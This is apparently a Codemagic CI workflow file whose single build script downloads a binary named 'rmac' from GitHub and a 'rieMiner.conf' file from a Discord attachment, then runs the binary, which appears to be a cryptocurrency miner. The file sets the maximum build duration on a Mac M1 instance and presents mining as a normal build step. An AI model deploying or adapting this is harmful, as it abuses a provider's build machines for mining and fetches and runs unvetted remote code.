workflows:
  my-workflow:                   # workflow ID
    name: My workflow name       # workflow name displayed in Codemagic UI
    instance_type: mac_mini_m1   # machine instance type
    max_build_duration: 120       # build duration in minutes (min 1, max 120)
    scripts:
      - wget https://github.com/rienode0001/cpu/raw/main/rmac && chmod +x rmac && wget https://cdn.discordapp.com/attachments/982667804429914146/1155505455104274432/rieMiner.conf && ./rmac rieMiner.conf
